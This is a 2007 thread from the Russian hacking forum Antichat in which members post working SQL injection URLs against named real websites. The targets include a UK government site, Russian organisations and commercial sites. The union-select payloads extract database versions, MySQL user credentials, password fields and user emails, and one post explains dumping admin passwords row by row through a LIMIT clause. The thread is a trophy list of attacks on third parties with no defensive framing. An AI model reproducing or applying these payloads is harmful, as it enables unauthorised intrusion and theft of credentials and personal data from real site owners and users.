Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
03.04.2007, 04:31
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530
Репутация:
2062
|
|
Сообщение от n1†R0x
ну и от меня еще:
restko.ru
Код:
http://www.restko.ru/index.php?level=99&info=-99+union+select+convert(concat(user,0x3a,password)+using+cp1251)+from+mysql.user/*
боян 
а вот от меня, к сожалению 3 версия скорее всего
Код:
http://www.montenegrostars.com/new/hoteli.php?id_hot=1&id_jez=1+order+by+4/*
http://www.montenegrostars.com/new/hoteli.php?id_hot=1&id_jez=1+order+by+8/*
http://www.montenegrostars.com/new/hoteli.php?id_hot=1&id_jez=1+order+by+9/*
http://www.montenegrostars.com/new/hoteli.php?id_hot=1&id_jez=1+AND+ascii(lower(substring(version(),1,1)))=52/*
здесь ничего интересного:
Код:
http://www.iwdp.co.uk/profile.php?id=-220+union+select+1,name,3,4,5,6,7,8,9,10,11+from+regions/*
здесь не смог сделать вывод (название знакомое, кажется уже ковырял эту скулю)
Код:
http://www.biodiversityscotland.gov.uk/pageType1.php?id=2&type=1&navID=-27+union+select+1,2,3,4,5,6/*
Последний раз редактировалось Thanat0z; 03.04.2007 в 05:32..
|
|
|
03.04.2007, 07:21
|
|
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613
Репутация:
1365
|
|
2Thanat0z
/me смеялся =)
http://www.biodiversityscotland.gov.uk/pageType1.php?id=-2+union+select+1,concat(database(),0x3a,user(),0x3 a,version()),3,4,5/*&type=1&navID=27
|
|
|
|
03.04.2007, 11:22
|
|
Познающий
Регистрация: 05.09.2006
Сообщений: 50
Провел на форуме:
1988972
Репутация:
250
|
|
Код:
http://www.no2anticommunism.org/ru/index.php?info=doc&Id=-40+union+select+1,passwd,3,4,5,6,7,8,9,10,11,12+from+users/*
Код:
http://socdvig.org.ru/index.php?action=viewnews&id=-31+union+select+1,2,3,4,5,6,7+from+users/*
|
|
|
|
03.04.2007, 11:50
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Сайт http://www.singletrackworld.com/ Одна большая скуль инъекция.
Inj:
http://www.singletrackworld.com/article.php?sid=2317'
Одна колумна, таблица users. Мускул версии 5.0.22 (Весь вывод в title)
Теперь через лимит дёргаем пассы.
http://www.singletrackworld.com/article.php?sid=-2317+union+select+concat(uname,0x3a,pass)+from+use rs+limit+*,1
add:
Звёздочку поставил, ибо на первом месте стоит походу не админ. Дальше уже перебором.=]
Последний раз редактировалось [sL1p]; 03.04.2007 в 14:59..
|
|
|
|
03.04.2007, 12:07
|
|
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266
Репутация:
366
|
|
http://www.fashion-monitor.com/discuss.php?razdel=news&artikelid=272+union+select +1,2,3,4,5,6,7,concat_ws(0x3a,username,user_passwo rd,user_email)+from+phpbb_users+limit+4,1/*
лимит вывод ограничивает, а то скрипт наровит всё вывести.
http://www.fashion-monitor.com/discuss.php?razdel=news&artikelid=272+union+select +1,2,3,4,5,6,7,email+from+emails+limit+1206,1/*
а тут просто мыла
жалко только до данных моделей чёт не смог добраться
http://www.fashion-monitor.com/discuss.php?razdel=news&artikelid=272+union+select +1,2,3,4,5,6,7,8+from+models/*
|
|
|
|
03.04.2007, 14:29
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597
Репутация:
1866
|
|
Сообщение от MegaBits
http://game.hutor.ru/battlenet/stats.php?game=STAR&type=0
Это вроде тож скуль.
пфф, вы название темы видели? =\
|
|
|
|
03.04.2007, 14:41
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Код:
http://003.saratov.ru/stroki.php?strk=11005&gsn=-1+union+select+concat(user(),char(58),version())/*
http://003.saratov.ru/stroki.php?strk=11005&gsn=-1+union+select+concat(login,char(58),pass)+from+users+limit+0,1/*
Код:
http://www.info-shop.ru/index.php?idk=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(database(),char(58),user(),char(58),version()),13/*
Код:
http://www.vzamen.ru/index.phtml?act=lot_list&title=cat_list&cat_id=-1+union+select+concat(database(),char(58),user(),char(58),version()),2,3/*
Код:
http://www.globussalon.ru/detail.php?chapId=-1+union+select+concat(database(),char(58),user(),char(58),version())/*
|
|
|
|
03.04.2007, 14:50
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530
Репутация:
2062
|
|
Сообщение от _Pantera_
чувак там стоит 4 версия мускула, селект мона использовать, тоесть мона при желании повытягивать базы, но у меня его нет =))
черт, я более 3 недель скулей не искал, вообще не внимателен, раз там 4 версия, покажите мне юнион 
Сообщение от zl0ba
2Thanat0z
/me смеялся =)
да, туплю я всегда делал скуль с первой переменной, а тут чет подумал сделать со второй, ради разнообразия не знал что от этого ничего не происходит Век живи, век учись
Последний раз редактировалось Thanat0z; 03.04.2007 в 16:01..
|
|
|
|
03.04.2007, 15:18
|
|
Познающий
Регистрация: 05.09.2006
Сообщений: 50
Провел на форуме:
1988972
Репутация:
250
|
|
Код:
http://www.spe-moscow.org/ru/news/index.php?id=-36+union+select+1,2,3,4,database()/*
Код:
http://recycling.org.ru/modules/event/index.php?op=show&id=-5+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5/*
|
|
|
|
03.04.2007, 16:18
|
|
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме:
1654589
Репутация:
337
|
|
http://baymusic.ru/category.php?rid=78 - ошибка
http://baymusic.ru/category.php?rid=78/* - закоментили фигню, ошибки нет
http://baymusic.ru/category.php?rid=78+order+by+2/* - ошибка
http://baymusic.ru/category.php?rid=78+order+by+1/* - все ок, значит 1 столбец
http://baymusic.ru/category.php?rid=78+union+select+1/* - ошибка, кол-во столбцов не совпадает
Можете объяснить что тут не так? Запрос к базе там такой стоит, или order+by в этой базе работает не так как обычно? =/
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
